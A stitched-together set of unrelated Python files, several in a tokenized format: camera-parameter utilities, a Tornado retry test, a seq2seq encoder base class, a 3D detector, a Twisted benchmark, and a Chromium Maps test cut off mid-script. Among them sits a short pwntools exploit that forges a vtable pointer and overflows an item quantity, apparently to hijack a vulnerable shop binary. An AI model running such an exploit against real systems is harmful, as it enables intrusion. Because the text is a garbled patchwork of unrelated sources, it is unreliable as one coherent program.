Returns: dict: Put self.name and self.parameters_dict in one dict. """<line_sep>dump_dict=self.parameters_dict.copy()<line_sep>dump_dict['name']=self.name<line_sep><return>dump_dict<block_end><def_stmt>dump self json_path:str<arrow><none><block_start>"""Dump camera name and parameters to a file. Returns: dict: Put self.name and self.parameters_dict in one dict, and dump them to a json file. """<line_sep>dump_dict=self.to_dict()<with_stmt>open(json_path 'w')<as>f_write<block_start>json.dump(dump_dict f_write)<block_end><block_end><def_stmt>load self json_path:str<arrow><none><block_start>"""Load camera name and parameters from a file."""<with_stmt>open(json_path 'r')<as>f_read<block_start>dumped_dict=json.load(f_read)<block_end>self.load_from_dict(dumped_dict)<block_end><def_stmt>load_from_dict self json_dict:dict<arrow><none><block_start>"""Load name and parameters from a dict. Args: json_dict (dict): A dict comes from self.to_dict(). """<for_stmt>key json_dict.keys()<block_start><if_stmt>key<eq>'name'<block_start>self.name=json_dict[key]<block_end><elif_stmt>key<eq>'rotation'<block_start>self.parameters_dict['rotation_mat']=np.array(json_dict[key]).reshape(3 3).tolist()<block_end><elif_stmt>key<eq>'translation'<block_start>self.parameters_dict[key]=np.array(json_dict[key]).reshape((3)).tolist()<block_end><else_stmt><block_start>self.parameters_dict[key]=json_dict[key]<if_stmt>'_mat'<in>key<block_start>self.parameters_dict[key]=np.array(self.parameters_dict[key]).reshape(3 3).tolist()<block_end><block_end><block_end><block_end><def_stmt>load_from_chessboard self chessboard_dict:dict name:str inverse:bool=<true><arrow><none><block_start>"""Load name and parameters from a dict. Args: chessboard_dict (dict): A dict loaded from json.load(chessboard_file). name (str): Name of this camera. inverse (bool, optional): Whether to inverse rotation and translation mat. Defaults to False. 
"""<line_sep>camera_param_dict=__parse_chessboard_param__(chessboard_dict name inverse=inverse)<line_sep>self.load_from_dict(camera_param_dict)<block_end><def_stmt>load_kinect_from_smc self smc_reader kinect_id:int<arrow><none><block_start>"""Load name and parameters of a kinect from an SmcReader instance. Args: smc_reader (mmhuman3d.data.data_structures.smc_reader.SMCReader): An SmcReader instance containing kinect camera parameters. kinect_id (int): Id of the target kinect. """<line_sep>name=kinect_id<line_sep>extrinsics_dict=smc_reader.get_kinect_color_extrinsics(kinect_id homogeneous=<false>)<line_sep>rot_np=extrinsics_dict['R']<line_sep>trans_np=extrinsics_dict['T']<line_sep>intrinsics_np=smc_reader.get_kinect_color_intrinsics(kinect_id)<line_sep>resolution=smc_reader.get_kinect_color_resolution(kinect_id)<line_sep>rmatrix=np.linalg.inv(rot_np).reshape(3 3)<line_sep>tvec=-np.dot(rmatrix trans_np)<line_sep>self.name=name<line_sep>self.set_mat_np('in_mat' intrinsics_np)<line_sep>self.set_mat_np('rotation_mat' rmatrix)<line_sep>self.set_value('translation' tvec.tolist())<line_sep>self.set_value('H' resolution[1])<line_sep>self.set_value('W' resolution[0])<block_end><def_stmt>load_iphone_from_smc self smc_reader iphone_id:int=0 frame_id:int=0<arrow><none><block_start>"""Load name and parameters of an iPhone from an SmcReader instance. Args: smc_reader (mmhuman3d.data.data_structures.smc_reader.SMCReader): An SmcReader instance containing kinect camera parameters. iphone_id (int): Id of the target iphone. Defaults to 0. frame_id (int): Frame ID of one selected frame. It only influences the intrinsics. Defaults to 0. 
"""<line_sep>name=f'iPhone_{iphone_id}'<line_sep>extrinsics_mat=smc_reader.get_iphone_extrinsics(iphone_id homogeneous=<true>)<line_sep>rot_np=extrinsics_mat[:3 :3]<line_sep>trans_np=extrinsics_mat[:3 3]<line_sep>intrinsics_np=smc_reader.get_iphone_intrinsics(iphone_id frame_id)<line_sep>resolution=smc_reader.get_iphone_color_resolution(iphone_id)<line_sep>rmatrix=np.linalg.inv(rot_np).reshape(3 3)<line_sep>tvec=-np.dot(rmatrix trans_np)<line_sep>self.name=name<line_sep>self.set_mat_np('in_mat' intrinsics_np)<line_sep>self.set_mat_np('rotation_mat' rmatrix)<line_sep>self.set_value('translation' tvec.tolist())<line_sep>self.set_value('H' resolution[1])<line_sep>self.set_value('W' resolution[0])<block_end>@classmethod<def_stmt>load_from_perspective_cameras cls cam name:str resolution:Union[List Tuple]=<none><block_start>"""Load parameters from a PerspectiveCameras and return a CameraParameter. Args: cam (mmhuman3d.core.cameras.cameras.PerspectiveCameras): An instance. name (str): Name of this camera. 
"""<assert_stmt>isinstance(cam PerspectiveCameras) 'Wrong input, support PerspectiveCameras only!'<if_stmt>len(cam)<g>1<block_start>warnings.warn('Will only use the first camera in the batch.')<block_end>cam=cam[0]<line_sep>resolution=resolution<if>resolution<is><not><none><else>cam.resolution[0].tolist()<line_sep>height,width=int(resolution[0]) int(resolution[1])<line_sep>cam_param=CameraParameter()<line_sep>cam_param.__init__(H=height W=width name=name)<line_sep>k_4x4=cam.K# shape (1, 4, 4) r_3x3=cam.R# shape (1, 3, 3) t_3=cam.T# shape (1, 3) is_perspective=cam.is_perspective()<line_sep>in_ndc=cam.in_ndc()<line_sep>k_4x4,r_3x3,t_3=convert_camera_matrix(K=k_4x4 R=r_3x3 T=t_3 is_perspective=<false> in_ndc_dst=<false> in_ndc_src=in_ndc convention_src='pytorch3d' convention_dst='opencv' resolution_src=(height width) resolution_dst=(height width))<line_sep>k_3x3=convert_K_4x4_to_3x3(k_4x4 is_perspective=is_perspective)<line_sep>k_3x3=k_3x3.numpy()[0]<line_sep>r_3x3=r_3x3.numpy()[0]<line_sep>t_3=t_3.numpy()[0]<line_sep>cam_param.name=name<line_sep>cam_param.set_mat_np('in_mat' k_3x3)<line_sep>cam_param.set_mat_np('rotation_mat' r_3x3)<line_sep>cam_param.set_value('translation' t_3.tolist())<line_sep>cam_param.parameters_dict.update(H=height)<line_sep>cam_param.parameters_dict.update(W=width)<line_sep><return>cam_param<block_end><def_stmt>export_to_perspective_cameras self<arrow>PerspectiveCameras<block_start>"""Export to a opencv defined screen space PerspectiveCameras. Returns: Same defined PerspectiveCameras of batch_size 1. 
"""<line_sep>height=self.parameters_dict['H']<line_sep>width=self.parameters_dict['W']<line_sep>k_4x4,rotation,translation=self.get_KRT(k_dim=4)<line_sep>k_4x4=np.expand_dims(k_4x4 0)# shape (1, 3, 3) rotation=np.expand_dims(rotation 0)# shape (1, 3, 3) translation=np.expand_dims(translation 0)# shape (1, 3) new_K=torch.from_numpy(k_4x4)<line_sep>new_R=torch.from_numpy(rotation)<line_sep>new_T=torch.from_numpy(translation)<line_sep>cam=build_cameras(dict(type='PerspectiveCameras' K=new_K.float() R=new_R.float() T=new_T.float() convention='opencv' in_ndc=<false> resolution=(height width)))<line_sep><return>cam<block_end><def_stmt>validate_item self key:Any val:Any<arrow>List<block_start>"""Check whether the key and its value matches definition in CameraParameter.SUPPORTED_KEYS. Args: key (Any): Key in CameraParameter. val (Any): Value to the key. Raises: KeyError: key cannot be found in CameraParameter.SUPPORTED_KEYS. TypeError: Value's type doesn't match definition. Returns: key (Any): The input key. val (Any): The value casted into correct format. """<line_sep>self.__check_key__(key)<line_sep>formatted_val=self.__validate_value_type__(key val)<line_sep><return>key formatted_val<block_end><def_stmt>__check_key__ self key:Any<arrow><none><block_start>"""Check whether the key matches definition in CameraParameter.SUPPORTED_KEYS. Args: key (Any): Key in CameraParameter. Raises: KeyError: key cannot be found in CameraParameter.SUPPORTED_KEYS. """<if_stmt>key<not><in>self.__class__.SUPPORTED_KEYS<block_start>err_msg='Key check failed in CameraParameter:\n'<line_sep>err_msg<augadd>f'key={str(key)}\n'<line_sep><raise>KeyError(err_msg)<block_end><block_end><def_stmt>__validate_value_type__ self key:Any val:Any<arrow>Any<block_start>"""Check whether the type of value matches definition in CameraParameter.SUPPORTED_KEYS. Args: key (Any): Key in CameraParameter. val (Any): Value to the key. Raises: TypeError: Value is supported but doesn't match definition. 
Returns: val (Any): The value casted into correct format. """<line_sep>np_type_mapping={int:np.integer float:np.floating}<line_sep>supported_keys=self.__class__.SUPPORTED_KEYS<line_sep>validation_result=_TypeValidation.FAIL<line_sep>ret_val=<none><if_stmt>supported_keys[key]['type']<eq>int<or>supported_keys[key]['type']<eq>float<block_start>type_str=str(type(val))<line_sep>class_name=type_str.split('\'')[1]<if_stmt>type(val)<eq>self.__class__.SUPPORTED_KEYS[key]['type']<block_start>validation_result=_TypeValidation.MATCH<line_sep>ret_val=val<block_end><elif_stmt>class_name.startswith('numpy')# a value is required, not array <block_start><if_stmt>np.issubdtype(type(val) np_type_mapping[supported_keys[key]['type']])<block_start>validation_result=_TypeValidation.MATCH<line_sep>ret_val=val.astype(supported_keys[key]['type'])<block_end><elif_stmt>np.issubdtype(type(val) np.ndarray)<block_start>validation_result=_TypeValidation.ARRAY<block_end><block_end><elif_stmt>class_name.startswith('torch')# only one element tensors # can be converted to Python scalars <block_start><if_stmt>len(val.size())<eq>0<block_start>val_item=val.item()<if_stmt>type(val_item)<eq>supported_keys[key]['type']<block_start>validation_result=_TypeValidation.MATCH<line_sep>ret_val=val_item<block_end><block_end><else_stmt><block_start>validation_result=_TypeValidation.ARRAY<block_end><block_end><block_end><else_stmt><block_start><if_stmt>type(val)<eq>self.__class__.SUPPORTED_KEYS[key]['type']<block_start>validation_result=_TypeValidation.MATCH<line_sep>ret_val=val<block_end><block_end><if_stmt>validation_result<ne>_TypeValidation.MATCH<block_start>err_msg='Type check failed in CameraParameter:\n'<line_sep>err_msg<augadd>f'key={str(key)}\n'<line_sep>err_msg<augadd>f'type(val)={type(val)}\n'<if_stmt>validation_result<eq>_TypeValidation.ARRAY<block_start>err_msg<augadd>'A single value is expected, '+'neither an array nor a 
slice.\n'<block_end><raise>TypeError(err_msg)<block_end><return>ret_val<block_end><block_end><def_stmt>__parse_chessboard_param__ chessboard_camera_param name inverse=<true><block_start>"""Parse a dict loaded from chessboard file into another dict needed by CameraParameter. Args: chessboard_camera_param (dict): A dict loaded from json.load(chessboard_file). name (str): Name of this camera. inverse (bool, optional): Whether to inverse rotation and translation mat. Defaults to True. Returns: dict: A dict of parameters in CameraParameter.to_dict() format. """<line_sep>camera_param_dict={}<line_sep>camera_param_dict['H']=chessboard_camera_param['imgSize'][1]<line_sep>camera_param_dict['W']=chessboard_camera_param['imgSize'][0]<line_sep>camera_param_dict['in_mat']=chessboard_camera_param['K']<line_sep>camera_param_dict['k1']=0<line_sep>camera_param_dict['k2']=0<line_sep>camera_param_dict['k3']=0<line_sep>camera_param_dict['k4']=0<line_sep>camera_param_dict['k5']=0<line_sep>camera_param_dict['p1']=0<line_sep>camera_param_dict['p2']=0<line_sep>camera_param_dict['name']=name<line_sep>camera_param_dict['rotation']=chessboard_camera_param['R']<line_sep>camera_param_dict['translation']=chessboard_camera_param['T']<if_stmt>inverse<block_start>rmatrix=np.linalg.inv(np.array(camera_param_dict['rotation']).reshape(3 3))<line_sep>camera_param_dict['rotation']=rmatrix.tolist()<line_sep>tmatrix=np.array(camera_param_dict['translation']).reshape((3 1))<line_sep>tvec=-np.dot(rmatrix tmatrix)<line_sep>camera_param_dict['translation']=tvec.reshape((3)).tolist()<block_end><return>camera_param_dict<block_end>__distort_coefficient_names__=['k1' 'k2' 'k3' 'k4' 'k5' 'k6' 'p1' 'p2']<def_stmt>__zero_mat_list__ n=3<block_start>"""Return a zero mat in list format. Args: n (int, optional): Length of the edge. Defaults to 3. Returns: list: List[List[int]] """<line_sep>ret_list=[[0]<times>n<for>_ range(n)]<line_sep><return>ret_list<block_end>
# coding: utf-8 # Copyright 2017 <NAME> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>unittest<import_from_stmt>dbnd._vendor.tenacity retry<import_from_stmt>dbnd._vendor.tenacity tornadoweb<import_from_stmt>dbnd._vendor.tenacity.tests.test_tenacity NoIOErrorAfterCount<import_from_stmt>tornado gen<import_from_stmt>tornado testing<line_sep>@retry@gen.coroutine<def_stmt>_retryable_coroutine thing<block_start><yield>gen.sleep(0.00001)<line_sep>thing.go()<block_end><class_stmt>TestTornado(testing.AsyncTestCase)<block_start>@testing.gen_test<def_stmt>test_retry self<block_start><assert_stmt>gen.is_coroutine_function(_retryable_coroutine)<line_sep>thing=NoIOErrorAfterCount(5)<line_sep><yield>_retryable_coroutine(thing)<assert_stmt>thing.counter<eq>thing.count<block_end><def_stmt>test_repr self<block_start>repr(tornadoweb.TornadoRetrying())<block_end><def_stmt>test_old_tornado self<block_start>old_attr=gen.is_coroutine_function<try_stmt><block_start><del_stmt>gen.is_coroutine_function<line_sep># is_coroutine_function was introduced in tornado 4.5; # verify that we don't *completely* fall over on old versions @retry<def_stmt>retryable thing<block_start><pass><block_end><block_end><finally_stmt><block_start>gen.is_coroutine_function=old_attr<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
<import_from_stmt>pwn *<line_sep># Create item print('1')<line_sep>FUNC=0x701e40<line_sep>#FUNC = 0x41414141 + 0x18 vtable_ptr=FUNC-0x18<line_sep>print(p64(vtable_ptr)<times>8)# name - pointer to fake vtable print('bob')# description print('1.23')# price # Add item to basket print('4')<line_sep>print('1')# second item, added above print('288230376151711745')# quantity - (2**64 / 64) + 1 # Check out print('6')<line_sep>
# Copyright (c) 2018 NVIDIA Corporation
from __future__ import absolute_import, division, print_function
from __future__ import unicode_literals

import abc
import copy

import six
import tensorflow as tf

from open_seq2seq.optimizers.mp_wrapper import mp_regularizer_wrapper
from open_seq2seq.utils.utils import check_params, cast_types


@six.add_metaclass(abc.ABCMeta)
class Encoder:
    """Abstract class from which all encoders must inherit."""

    @staticmethod
    def get_required_params():
        """Static method with description of required parameters.

        Returns:
            dict: Dictionary containing all the parameters that **have to** be
            included into the ``params`` parameter of the
            class :meth:`__init__` method.
        """
        return {}

    @staticmethod
    def get_optional_params():
        """Static method with description of optional parameters.

        Returns:
            dict: Dictionary containing all the parameters that **can** be
            included into the ``params`` parameter of the
            class :meth:`__init__` method.
        """
        return {
            'regularizer': None,  # any valid TensorFlow regularizer
            'regularizer_params': dict,
            'initializer': None,  # any valid TensorFlow initializer
            'initializer_params': dict,
            'dtype': [tf.float32, tf.float16, 'mixed'],
        }

    def __init__(self, params, model, name="encoder", mode='train'):
        """Encoder constructor.

        Note that encoder constructors should not modify the TensorFlow graph;
        all graph construction should happen in the
        :meth:`self._encode() <_encode>` method.

        Args:
            params (dict): parameters describing the encoder.
                All supported parameters are listed in
                :meth:`get_required_params`, :meth:`get_optional_params`
                functions.
            model (instance of a class derived from
                :class:`Model<models.model.Model>`): parent model that created
                this encoder. Could be None if no model access is required for
                the use case.
            name (str): name for encoder variable scope.
            mode (str): mode encoder is going to be run in.
                Could be "train", "eval" or "infer".

        Config parameters:

        * **initializer** --- any valid TensorFlow initializer. If no
          initializer is provided, model initializer will be used.
        * **initializer_params** (dict) --- dictionary that will be passed to
          initializer ``__init__`` method.
        * **regularizer** --- any valid TensorFlow regularizer. If no
          regularizer is provided, model regularizer will be used.
        * **regularizer_params** (dict) --- dictionary that will be passed to
          regularizer ``__init__`` method.
        * **dtype** --- model dtype. Could be either ``tf.float16``,
          ``tf.float32`` or "mixed". For details see
          :ref:`mixed precision training <mixed_precision>` section in docs.
          If no dtype is provided, model dtype will be used.
        """
        check_params(params, self.get_required_params(),
                     self.get_optional_params())
        # Deep copy so later in-place mutations (regularizer instantiation,
        # 'mixed' -> tf.float16 rewrite in encode()) never leak back into the
        # caller's config dict.
        self._params = copy.deepcopy(params)
        self._model = model

        # Inherit dtype from the parent model when not configured explicitly;
        # stand-alone encoders (model is None) default to float32.
        if 'dtype' not in self._params:
            if self._model:
                self._params['dtype'] = self._model.params['dtype']
            else:
                self._params['dtype'] = tf.float32

        self._name = name
        self._mode = mode
        # One-shot latch: the parameter "compilation" in encode() must only
        # run on the first call.
        self._compiled = False

    def encode(self, input_dict):
        """Wrapper around :meth:`self._encode() <_encode>` method.

        Here name, initializer and dtype are set in the variable scope and
        then the :meth:`self._encode() <_encode>` method is called.

        Args:
            input_dict (dict): see :meth:`self._encode() <_encode>` docs.

        Returns:
            see :meth:`self._encode() <_encode>` docs.
        """
        if not self._compiled:
            # Fall back to the parent model's regularizer config when the
            # encoder has none of its own.
            if 'regularizer' not in self._params:
                if self._model and 'regularizer' in self._model.params:
                    self._params['regularizer'] = copy.deepcopy(
                        self._model.params['regularizer'])
                    self._params['regularizer_params'] = copy.deepcopy(
                        self._model.params['regularizer_params'])

            if 'regularizer' in self._params:
                init_dict = self._params.get('regularizer_params', {})
                # Instantiate the regularizer class with its params; the
                # params entry is replaced by the resulting callable.
                if self._params['regularizer'] is not None:
                    self._params['regularizer'] = self._params['regularizer'](
                        **init_dict)
                # NOTE(review): the wrapper is applied even when the resolved
                # regularizer is None -- presumably mp_regularizer_wrapper
                # tolerates that; confirm against its implementation.
                if self._params['dtype'] == 'mixed':
                    self._params['regularizer'] = mp_regularizer_wrapper(
                        self._params['regularizer'],
                    )

            # After compilation, 'mixed' precision means the graph itself is
            # built in float16.
            if self._params['dtype'] == 'mixed':
                self._params['dtype'] = tf.float16

        if 'initializer' in self.params:
            init_dict = self.params.get('initializer_params', {})
            initializer = self.params['initializer'](**init_dict)
        else:
            initializer = None

        self._compiled = True

        with tf.variable_scope(self._name, initializer=initializer,
                               dtype=self.params['dtype']):
            return self._encode(self._cast_types(input_dict))

    def _cast_types(self, input_dict):
        """This function performs automatic cast of all inputs to encoder
        dtype.

        Args:
            input_dict (dict): dictionary passed to
                :meth:`self._encode() <_encode>` method.

        Returns:
            dict: same as input_dict, but with all Tensors cast to encoder
            dtype.
        """
        return cast_types(input_dict, self.params['dtype'])

    @abc.abstractmethod
    def _encode(self, input_dict):
        """This is the main function which should construct encoder graph.
        Typically, encoder will take raw input sequence as an input and
        produce some hidden representation as an output.

        Args:
            input_dict (dict): dictionary containing encoder inputs.
                If the encoder is used with :class:`models.encoder_decoder`
                class, ``input_dict`` will have the following content::

                    {
                        "source_tensors": data_layer.input_tensors['source_tensors']
                    }

        Returns:
            dict: dictionary of encoder outputs. Return all necessary outputs.
            Typically this will be just::

                {
                    "outputs": outputs,
                    "state": state,
                }
        """
        pass

    @property
    def params(self):
        """Parameters used to construct the encoder (dictionary)."""
        return self._params

    @property
    def mode(self):
        """Mode encoder is run in."""
        return self._mode

    @property
    def name(self):
        """Encoder name."""
        return self._name
"""timeflux.nodes.sequence: generate a sequence"""<import_from_stmt>timeflux.core.node Node<class_stmt>Sequence(Node)<block_start><def_stmt>__init__ self<block_start>"""Generate a sequence"""<line_sep>self._current=0<block_end><def_stmt>update self<block_start>self.o.set([self._current])<line_sep>self._current<augadd>1<block_end><block_end>
<import_from_stmt>. utils<def_stmt>load_dataset task_name function_name test<block_start>"""Load a dataset for a task."""<line_sep>fun=utils.get_function(task_name "datasets" function_name)<line_sep><return>fun(test=test)<block_end><def_stmt>main args<block_start>"""Run the ``load`` subcommand."""<line_sep>adata=load_dataset(args.task args.name args.test)<line_sep>adata.write_h5ad(args.output)<block_end>
<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_stmt>cv2<import_stmt>numpy<as>np<import_from_stmt>progress.bar Bar<import_stmt>time<import_stmt>torch<import_from_stmt>src.lib.external.nms soft_nms<import_from_stmt>src.lib.models.decode ddd_decode<import_from_stmt>src.lib.models.utils flip_tensor<import_from_stmt>src.lib.utils.image get_affine_transform<import_from_stmt>src.lib.utils.post_process ddd_post_process<import_from_stmt>src.lib.utils.debugger Debugger<import_from_stmt>src.lib.utils.ddd_utils compute_box_3d project_to_image alpha2rot_y<import_from_stmt>src.lib.utils.ddd_utils draw_box_3d unproject_2d_to_3d<import_from_stmt>.base_detector BaseDetector<class_stmt>DddDetector(BaseDetector)<block_start><def_stmt>__init__ self opt<block_start>super(DddDetector self).__init__(opt)<line_sep>self.calib=np.array([[707.0493 0 604.0814 45.75831] [0 707.0493 180.5066 -0.3454157] [0 0 1. 0.004981016]] dtype=np.float32)<block_end><def_stmt>pre_process self image scale calib=<none><block_start>height,width=image.shape[0:2]<line_sep>inp_height,inp_width=self.opt.input_h self.opt.input_w<line_sep>c=np.array([width/2 height/2] dtype=np.float32)<if_stmt>self.opt.keep_res<block_start>s=np.array([inp_width inp_height] dtype=np.int32)<block_end><else_stmt><block_start>s=np.array([width height] dtype=np.int32)<block_end>trans_input=get_affine_transform(c s 0 [inp_width inp_height])<line_sep>resized_image=image#cv2.resize(image, (width, height)) inp_image=cv2.warpAffine(resized_image trans_input (inp_width inp_height) flags=cv2.INTER_LINEAR)<line_sep>inp_image=(inp_image.astype(np.float32)/255.)<line_sep>inp_image=(inp_image-self.mean)/self.std<line_sep>images=inp_image.transpose(2 0 1)[np.newaxis <ellipsis>]<line_sep>calib=np.array(calib dtype=np.float32)<if>calib<is><not><none><else>self.calib<line_sep>images=torch.from_numpy(images)<line_sep>meta={'c':c 's':s 
'out_height':inp_height<floordiv>self.opt.down_ratio 'out_width':inp_width<floordiv>self.opt.down_ratio 'calib':calib}<line_sep><return>images meta<block_end><def_stmt>process self images return_time=<false><block_start><with_stmt>torch.no_grad()<block_start>torch.cuda.synchronize()<line_sep>output=self.model(images)[-1]<line_sep>output['hm']=output['hm'].sigmoid_()<line_sep>output['dep']=1./(output['dep'].sigmoid()+1e-6)-1.<line_sep>wh=output['wh']<if>self.opt.reg_bbox<else><none><line_sep>reg=output['reg']<if>self.opt.reg_offset<else><none><line_sep>torch.cuda.synchronize()<line_sep>forward_time=time.time()<line_sep>dets=ddd_decode(output['hm'] output['rot'] output['dep'] output['dim'] wh=wh reg=reg K=self.opt.K)<block_end><if_stmt>return_time<block_start><return>output dets forward_time<block_end><else_stmt><block_start><return>output dets<block_end><block_end><def_stmt>post_process self dets meta scale=1<block_start>dets=dets.detach().cpu().numpy()<line_sep>detections=ddd_post_process(dets.copy() [meta['c']] [meta['s']] [meta['calib']] self.opt)<line_sep>self.this_calib=meta['calib']<line_sep><return>detections[0]<block_end><def_stmt>merge_outputs self detections<block_start>results=detections[0]<for_stmt>j range(1 self.num_classes+1)<block_start><if_stmt>len(results[j]<g>0)<block_start>keep_inds=(results[j][: -1]<g>self.opt.peak_thresh)<line_sep>results[j]=results[j][keep_inds]<block_end><block_end><return>results<block_end><def_stmt>debug self debugger images dets output scale=1<block_start>dets=dets.detach().cpu().numpy()<line_sep>img=images[0].detach().cpu().numpy().transpose(1 2 0)<line_sep>img=((img<times>self.std+self.mean)<times>255).astype(np.uint8)<line_sep>pred=debugger.gen_colormap(output['hm'][0].detach().cpu().numpy())<line_sep>debugger.add_blend_img(img pred 'pred_hm')<line_sep>debugger.add_ct_detection(img dets[0] show_box=self.opt.reg_bbox center_thresh=self.opt.vis_thresh img_id='det_pred')<block_end><def_stmt>show_results self debugger image 
results<block_start>debugger.add_3d_detection(image results self.this_calib center_thresh=self.opt.vis_thresh img_id='add_pred')<line_sep>debugger.add_bird_view(results center_thresh=self.opt.vis_thresh img_id='bird_pred')<line_sep>debugger.show_all_imgs(pause=self.pause)<block_end><block_end>
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.

"""
Benchmarks comparing the write performance of a "normal" Protocol instance
and an instance of a Protocol class which has had L{twisted.conch.mixin}'s
L{BufferingMixin<twisted.conch.mixin.BufferingMixin>} mixed in to perform
Nagle-like write coalescing.
"""

from pprint import pprint
from sys import stdout
from time import time

from twisted.conch.mixin import BufferingMixin
from twisted.internet import reactor
from twisted.internet.defer import Deferred
from twisted.internet.protocol import ClientCreator, Protocol, ServerFactory
from twisted.python.log import startLogging
from twisted.python.usage import Options


class BufferingBenchmark(Options):
    """
    Options for configuring the execution parameters of a benchmark run.
    """

    optParameters = [
        ("scale", "s", "1",
         "Work multiplier (bigger takes longer, might resist noise better)")]

    def postOptions(self):
        # Command-line values arrive as strings; convert once up front.
        self["scale"] = int(self["scale"])


class ServerProtocol(Protocol):
    """
    A silent protocol which only waits for a particular amount of input and
    then fires a Deferred.
    """

    def __init__(self, expected, finished):
        # expected: number of bytes still awaited; finished: Deferred to fire.
        self.expected = expected
        self.finished = finished

    def dataReceived(self, bytes):
        self.expected -= len(bytes)
        if self.expected == 0:
            # Drop the reference before firing so the callback cannot be
            # invoked twice.
            finished, self.finished = self.finished, None
            finished.callback(None)


class BufferingProtocol(Protocol, BufferingMixin):
    """
    A protocol which uses the buffering mixin to provide a write method.
    """


class UnbufferingProtocol(Protocol):
    """
    A protocol which provides a naive write method which simply passes through
    to the transport.
    """

    def connectionMade(self):
        """
        Bind write to the transport's write method and flush to a no-op
        function in order to provide the same API as is provided by
        BufferingProtocol.
        """
        self.write = self.transport.write
        self.flush = lambda: None


def _write(proto, byteCount):
    # Send byteCount single-byte writes, then flush whatever was coalesced.
    # NOTE(review): "x" is a str; on Python 3 twisted transports require
    # bytes -- confirm whether this benchmark is still Python-2 only.
    write = proto.write
    flush = proto.flush

    for i in range(byteCount):
        write("x")
    flush()


def _benchmark(byteCount, clientProtocol):
    # Run one client/server round-trip of byteCount bytes and time it.
    # Returns a Deferred firing with {'connected', 'disconnected', 'duration'}.
    result = {}
    finished = Deferred()

    def cbFinished(ignored):
        result["disconnected"] = time()
        result["duration"] = result["disconnected"] - result["connected"]
        return result

    finished.addCallback(cbFinished)

    f = ServerFactory()
    f.protocol = lambda: ServerProtocol(byteCount, finished)
    # Port 0 lets the OS pick a free port; the client reads it back below.
    server = reactor.listenTCP(0, f)

    f2 = ClientCreator(reactor, clientProtocol)
    proto = f2.connectTCP("127.0.0.1", server.getHost().port)

    def connected(proto):
        result["connected"] = time()
        return proto

    proto.addCallback(connected)
    proto.addCallback(_write, byteCount)
    return finished


def _benchmarkBuffered(byteCount):
    # Benchmark the coalescing (BufferingMixin) client.
    return _benchmark(byteCount, BufferingProtocol)


def _benchmarkUnbuffered(byteCount):
    # Benchmark the pass-through client.
    return _benchmark(byteCount, UnbufferingProtocol)


def benchmark(scale=1):
    """
    Benchmark and return information regarding the relative performance of a
    protocol which does not use the buffering mixin and a protocol which does.

    @type scale: C{int}
    @param scale: A multiplier to the amount of work to perform

    @return: A Deferred which will fire with a dictionary mapping each of the
        two unicode strings C{u'buffered'} and C{u'unbuffered'} to
        dictionaries describing the performance of a protocol of each type.
        These value dictionaries will map the unicode strings C{u'connected'}
        and C{u'disconnected'} to the times at which each of those events
        occurred and C{u'duration'} to the difference between these two
        values.
    """
    overallResult = {}
    byteCount = 1024

    # Runs are sequential, not concurrent, so the two measurements do not
    # compete for the reactor.
    bufferedDeferred = _benchmarkBuffered(byteCount * scale)

    def didBuffered(bufferedResult):
        overallResult["buffered"] = bufferedResult

        unbufferedDeferred = _benchmarkUnbuffered(byteCount * scale)

        def didUnbuffered(unbufferedResult):
            overallResult["unbuffered"] = unbufferedResult
            return overallResult

        unbufferedDeferred.addCallback(didUnbuffered)
        return unbufferedDeferred

    bufferedDeferred.addCallback(didBuffered)
    return bufferedDeferred


def main(args=None):
    """
    Perform a single benchmark run, starting and stopping the reactor and
    logging system as necessary.
    """
    startLogging(stdout)

    options = BufferingBenchmark()
    options.parseOptions(args)

    d = benchmark(options["scale"])

    def cbBenchmark(result):
        pprint(result)

    def ebBenchmark(err):
        print(err.getTraceback())

    d.addCallbacks(cbBenchmark, ebBenchmark)

    def stopReactor(ign):
        reactor.stop()

    d.addBoth(stopReactor)
    reactor.run()


if __name__ == "__main__":
    main()
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

"""Runs a Google Maps pixel test.

Performs several common navigation actions on the map (pan, zoom, rotate)
then captures a screenshot and compares selected pixels against expected
values"""

import json
import optparse
import os

import cloud_storage_test_base
import maps_expectations

from telemetry import test
from telemetry.core import bitmap
from telemetry.core import util
from telemetry.page import page_test
from telemetry.page import page_set


class MapsValidator(cloud_storage_test_base.ValidatorBase):
    """Validator that compares selected screenshot pixels to expectations."""

    def __init__(self):
        super(MapsValidator, self).__init__('ValidatePage')

    def CustomizeBrowserOptions(self, options):
        # Needed so the page can drive GPU-specific JS hooks.
        options.AppendExtraBrowserArgs('--enable-gpu-benchmarking')

    def ValidatePage(self, page, tab, results):
        """Capture a screenshot and compare it against pixel expectations.

        Raises page_test.Failure on any mismatch; failing screenshots are
        uploaded to cloud storage (on bots) or written locally first.
        """
        # TODO: This should not be necessary, but it's not clear if the test
        # is failing on the bots in it's absence. Remove once we can verify
        # that it's safe to do so.
        MapsValidator.SpinWaitOnRAF(tab, 3)

        if not tab.screenshot_supported:
            raise page_test.Failure(
                'Browser does not support screenshot capture')
        screenshot = tab.Screenshot(5)
        if not screenshot:
            raise page_test.Failure('Could not capture screenshot')

        # Expectations are authored in CSS pixels; scale by the device pixel
        # ratio to index into the physical-pixel screenshot.
        dpr = tab.EvaluateJavaScript('window.devicePixelRatio')
        expected = self._ReadPixelExpectations(page)
        try:
            self._CompareToExpectations(screenshot, expected, dpr)
        except page_test.Failure:
            image_name = self._UrlToImageName(page.display_name)
            if self.options.test_machine_name:
                self._UploadErrorImagesToCloudStorage(
                    image_name, screenshot, None)
            else:
                self._WriteErrorImages(
                    self.options.generated_dir, image_name, screenshot, None)
            raise

    @staticmethod
    def SpinWaitOnRAF(tab, iterations, timeout=60):
        # Burn the given number of requestAnimationFrame cycles so rendering
        # settles before the screenshot is taken.
        waitScript = r"""
            window.__spinWaitOnRAFDone = false;
            var iterationsLeft = %d;

            function spin() {
              iterationsLeft--;
              if (iterationsLeft == 0) {
                window.__spinWaitOnRAFDone = true;
                return;
              }
              window.requestAnimationFrame(spin);
            }
            window.requestAnimationFrame(spin);
